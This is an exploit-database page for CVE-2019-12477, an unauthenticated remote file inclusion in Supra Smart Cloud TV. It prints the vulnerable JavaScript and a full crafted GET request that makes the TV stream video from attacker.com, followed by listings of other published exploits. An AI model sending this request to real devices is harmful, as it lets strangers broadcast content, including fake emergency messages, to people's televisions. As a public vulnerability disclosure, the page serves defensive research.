Search for hundreds of thousands of exploits

"Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion"

Author

Exploit author

"Dhiraj Mishra"

Platform

Exploit platform

hardware

Release date

Exploit published date

2019-06-06

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
Exploit Title: Remote file inclusion
# Date: 03-06-2019
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: https://supra.ru
# Software Link: https://supra.ru/catalog/televizory/televizor_supra_stv_lc40lt0020f/
# CVE: CVE-2019-12477
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2019-12477
# https://www.inputzero.io/2019/06/hacking-smart-tv.html

Summary:
Supra Smart Cloud TV allows remote file inclusion in the openLiveURL
function, which allows a local attacker to broadcast fake video without any
authentication via a /remote/media_control?action=setUri&uri=URI

Technical Observation:
We are abusing `openLiveURL()` which allows a local attacker to broadcast
video on supra smart cloud TV. I found this vulnerability initially by
source code review and then by crawling the application and reading every
request helped me to trigger this vulnerability.

Vulnerable code:

     function openLiveTV(url)
      {
      $.get("/remote/media_control",
{m_action:'setUri',m_uri:url,m_type:'video/*'},
       function (data, textStatus){
       if("success"==textStatus){
        alert(textStatus);
       }else
       {
        alert(textStatus);
       }
      });
      }

Vulnerable request:

    GET /remote/media_control?action=setUri&uri=
http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
    Host: 192.168.1.155
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0)
Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1

To trigger the vulnerability you can send a crafted request to the URL,

http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

Although the above mention URL takes (.m3u8) format based video. We can use
`curl -v -X GET` to send such request, typically this is an unauth remote
file inclusion. An attacker could broadcast any video without any
authentication, the worst case attacker could leverage this vulnerability
to broadcast a fake emergency message.
Release DateTitleTypePlatformAuthor
2020-06-01"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution"webappsphps1gh
2020-06-01"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation"webappsphp"Raphael Karger"
2020-06-01"VMware vCenter Server 6.7 - Authentication Bypass"webappsmultiplePhotubias
2020-05-29"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass"webappsmultiple"Halis Duraki"
2020-05-29"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)"webappsphpUnD3sc0n0c1d0
2020-05-28"Online-Exam-System 2015 - 'fid' SQL Injection"webappsphp"Berk Dusunur"
2020-05-28"EyouCMS 1.4.6 - Persistent Cross-Site Scripting"webappsphp"China Banking and Insurance Information Technology Management Co."
2020-05-28"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution"webappsphpTh3GundY
2020-05-28"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection"webappsmultiple"Berk Dusunur"
2020-05-27"LimeSurvey 4.1.11 - 'Permission Roles' Persistent Cross-Site Scripting"webappsphp"Matthew Aberegg"
Release DateTitleTypePlatformAuthor
2020-04-23"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)"webappscgi"Dhiraj Mishra"
2020-02-06"VIM 8.2 - Denial of Service (PoC)"doslinux"Dhiraj Mishra"
2020-01-16"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal"webappsmultiple"Dhiraj Mishra"
2019-06-06"Supra Smart Cloud TV - 'openLiveURL()' Remote File Inclusion"webappshardware"Dhiraj Mishra"
2019-05-27"Typora 0.9.9.24.6 - Directory Traversal"remotemacos"Dhiraj Mishra"
2019-04-30"Spring Cloud Config 2.1.x - Path Traversal (Metasploit)"webappsjava"Dhiraj Mishra"
2019-04-26"Apache Pluto 3.0.0 / 3.0.1 - Persistent Cross-Site Scripting"webappsjava"Dhiraj Mishra"
2019-04-18"Evernote 7.9 - Code Execution via Path Traversal"localmacos"Dhiraj Mishra"
2019-02-28"WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service"doslinux"Dhiraj Mishra"
2019-01-21"GattLib 0.2 - Stack Buffer Overflow"remotelinux"Dhiraj Mishra"
2018-11-06"libiec61850 1.3 - Stack Based Buffer Overflow"locallinux"Dhiraj Mishra"
2018-08-23"Epiphany Web Browser 3.28.1 - Denial of Service (PoC)"doslinux"Dhiraj Mishra"
2018-08-14"cgit 1.2.1 - Directory Traversal (Metasploit)"webappslinux"Dhiraj Mishra"
2018-08-14"Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)"webappslinux"Dhiraj Mishra"
2018-06-11"WebKitGTK+ < 2.21.3 - 'WebKitFaviconDatabase' Denial of Service (Metasploit)"doslinux"Dhiraj Mishra"
2018-06-05"WebKitGTK+ < 2.21.3 - Crash (PoC)"locallinux"Dhiraj Mishra"
2018-06-01"Epiphany 3.28.2.1 - Denial of Service"dosmultiple"Dhiraj Mishra"
2018-04-05"WebRTC - Private IP Leakage (Metasploit)"webappsmultiple"Dhiraj Mishra"
2017-12-20"Samsung Internet Browser - SOP Bypass (Metasploit)"remoteandroid"Dhiraj Mishra"
2017-09-02"IBM Notes 8.5.x/9.0.x - Denial of Service"dosmultiple"Dhiraj Mishra"
2017-08-31"IBM Notes 8.5.x/9.0.x - Denial of Service (Metasploit)"dosmultiple"Dhiraj Mishra"
2017-08-31"IBM Notes 8.5.x/9.0.x - Denial of Service (2)"dosmultiple"Dhiraj Mishra"
2017-08-30"Metasploit < 4.14.1-20170828 - Cross-Site Request Forgery"webappsruby"Dhiraj Mishra"
2017-08-09"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery"webappsmultiple"Dhiraj Mishra"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46971/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.